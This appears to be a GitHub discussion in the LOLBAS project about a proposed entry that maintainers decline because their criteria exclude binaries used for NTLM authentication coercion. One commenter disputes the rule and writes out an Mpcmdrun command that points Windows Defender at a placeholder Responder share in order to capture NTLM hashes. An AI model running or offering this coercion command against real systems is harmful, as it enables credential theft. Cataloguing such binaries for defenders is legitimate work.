Hey @ConsciousHacker , I saw you opened the original issue - would you mind double checking this entry? It looks good to me and seems to work as described.

Here's proof that the command is working properly:

However, I'll leave you to check for any typo errors 😄

After some discussion we have decided to not include this, however thank you for the contribution. We have also updated our criteria list (https://github.com/LOLBAS-Project/LOLBAS#criteria) so that it is clearer that we do not allow for binaries that does netntlm coercing

@api0cradle I am curious as to how can one coerce NTLM authentication with Notepad.exe and Notepad++ (i think you mean that when saying Paint++); may you share more insights into this? I am genuinely against the blockage of binaries that can coerce NTLM authentication as during an engegment knowing such ones may mean the difference between failure and success.

Here you go @PedantHTB

@api0cradle This is just navigating to that share and does not involve abusing notepad iteself (as it does not offer networking functionalities). Is it the same with Notepad++ or something else?
Suppose you land a reverse shell as a service account, will you even consider using this technique? If I land, I know several tools that will work such as Mpcmdrun:

• Mpcmdrun -Scan -ScanType 3 -File '\\responderserverip\share'

However, I cant share such techniques with others in this repo unfortunately 😢